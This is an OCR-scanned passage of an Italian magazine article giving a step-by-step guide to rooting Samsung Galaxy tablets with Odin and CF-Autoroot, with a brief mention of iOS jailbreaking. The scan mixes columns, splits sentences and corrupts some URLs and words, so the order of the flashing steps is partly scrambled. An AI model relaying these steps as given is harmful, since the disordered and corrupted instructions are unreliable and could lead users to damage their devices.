potrebbero quindi variare da modello a modello. Ma entriamo nel vivo della 


W Fig. 3 » Nel caso degli iPhone e degli iPad la procedura di root 
viene chiamata Jailbreak e consiste in un vero e proprio hack del 
dispositivo. Tra le diverse opzioni, con il Jailbreak gli utenti i0S 
possono installare applicazioni bypassando l’iTunes Store. 


questione: armiamoci di pazienza e sangue freddo e, soprattutto, verifichiamo 
con molta attenzione che il nostro tablet rientri tra quelli che è possibile “roo- 
tare”. Purtroppo per ragioni di spazio è impossibile descrivere le procedure di 
root per tutti i tablet presenti sul mercato. I dispositivi che trattiamo in queste 
pagine sono al momento i più popolari e pertanto i più diffusi. Ad ogni modo, 
come già detto precedentemente, le risorse in Rete non mancano ed è suffi- 
ciente fare una ricerca sul forum XDA per trovare una soluzione facile e veloce 
per il nostro modello. 


LA PROCEDURA DI ROOT SUI TABLET SAMSUNG 


Grazie ad Odin, un software utilizzato dai 
tecnici Samsung per installare firmware 


riginali sui loro terminali presente nella 


mE Samsung Galaxy Note 2 
Mi Samsung Galaxy Note 3 


nella casella PDA il file CFAutoroot 
rispondente al nostro modello e prece- 


dentemente scaricato da Atip://autoroot. 


sezione Mobile del Win CD/DVD-Rom], se 
siamo utenti dei tablet della casa coreana 
potremo fare il root del nostro dispositivo 
senza grossi problemi. Di seguito vedremo 
la procedura applicabile mediante il tool 
CF-Autoroot che permette a molti dispo- 
Sitivi di attivare il fantomatico superuser 
(http://autoroot.chai fire.eu) in maniera 
non eccessivamente Invasiva e potendo 
continuare a fruire degli aggiornamenti 
ufficiali di Samsung tramite Kies o via OTA 
Il.metodo preso in esame, inoltre, non 
cancella i nostri dati personali, né le appli- 
cazioni: tuttavia e sempre consigliabile fare 
un backup preventivo. | dispositivi compati- 


bili con la procedura sono i seguenti 


Mi Samsung Galaxy Tab 27.0 e 10.1 
M Samsung Galaxy Note 10.1 (2014) 
Wi-Fi, 3G ed LTE 


Mm Samsung Galaxy Note 8 e 10.1 


ce 
® Febbraio/Marzo 2014 


* Scompattiamo in una cartella del nostro 
computer il file odin.zip (sezione Mobile del 
Win CD/DVD-Rom] ed eseguiamo il file che 
viamo al suo interno 
* Colleghiamo il tablet [spento] col cavo 
USB al computer 
e Avviamo il tablet premendo contempo 
raneamente i tasti VOLUME GIU + HOME 
[tasto centrale] + POWER [il tasto di 
accensione). Apparirà un rettangolo giallo 
che ci avviserà del pericolo di installare un 
custom OS. Premiamo il tasto VOLUME SU 
per continuare ed entrare così in modalita 
Download 


e Odin mostrerà adesso la voce ADDED nel- 


la casella Message. Se ciò non dovesse ac- 


cadere significa che non abbiamo installato 
i driver USB del vostro tablet. Per risolvere, 


installiamo la suite Samsung Kies (www. 
winmagazine.it/link/2397) 
* A questo punto è necessario selezionare 


Chainfire.eu. Lasciamo selezionate le sole 
opzioni Auto-Reboot e F. Reset Time. Non 
selezioniamo mai l'opzione Re-Partizion 


Premiamo START per avviare la procedura 
di rooting che durera solo pochi secondi. A 

termine il tablet verra riavviato. Se ciò non 

dovesse accadere comparirà un messaggio 
di errore e sara quindi necessario ripetere 

nuovamente il procedimento. Se al contra 
rio comparirà il messaggio PASS significa 
che è andato tutto bene 
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